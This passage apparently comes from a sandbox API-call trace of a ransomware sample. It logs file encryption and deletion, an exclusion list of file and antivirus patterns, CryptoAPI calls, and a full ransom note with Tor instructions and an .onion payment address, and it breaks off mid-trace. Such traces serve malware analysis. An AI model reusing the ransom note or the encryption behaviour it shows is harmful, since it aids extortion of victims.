returned 0x20 [0154.475] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0154.475] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 1 [0154.475] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui")) returned 0 [0154.476] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" [0154.476] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 1 [0154.476] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\.xXCE87.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\.xxce87.tmp")) returned 0xce87 [0154.477] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\.xXCE87.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\.xxce87.tmp"), dwFlags=0x1) returned 0 [0154.477] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\.xXCE87.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\.xxce87.tmp")) returned 1 [0154.477] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0154.477] wcslen (_String="OK") returned 0x2 [0154.477] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.477] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.477] CryptDestroyKey (hKey=0x9ad278) returned 1 [0154.477] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0154.477] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0154.477] FindNextFileW (in: hFindFile=0x9ad4f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0154.477] GetLastError () returned 0x12 [0154.477] FindClose (in: hFindFile=0x9ad4f8 | out: hFindFile=0x9ad4f8) returned 1 [0154.478] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0154.478] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.478] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.479] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0154.479] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.479] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.479] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0154.479] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.479] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.exe") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.dll") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.lnk") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.bat") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.ini") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.msi") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*.scf") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*pagefile.sys*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*NTUSER.DAT*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*AppData*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\winrar\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\java\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\windows\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\ESET\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\AVG\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\AVIRA\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*Atheros*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*Realtek*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*bootmgr*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*boot*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*boot*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*CONFIG.SYS*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*IO.SYS*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*MSDOS.SYS*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*NTDETECT.COM*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*ntldr*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*chrome*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*opera*") returned 0 [0154.479] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", pszSpec="*firefox*") returned 0 [0154.479] wcslen (_String="\\\\?\\") returned 0x4 [0154.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad7f8 [0154.480] wcscmp (_String1=".", _String2=".") returned 0 [0154.480] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.480] wcscmp (_String1="..", _String2=".") returned 1 [0154.480] wcscmp (_String1="..", _String2="..") returned 0 [0154.480] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0154.480] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0154.481] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui", pszSpec="*") returned 1 [0154.481] strlen (_Str="NMoreira") returned 0x8 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 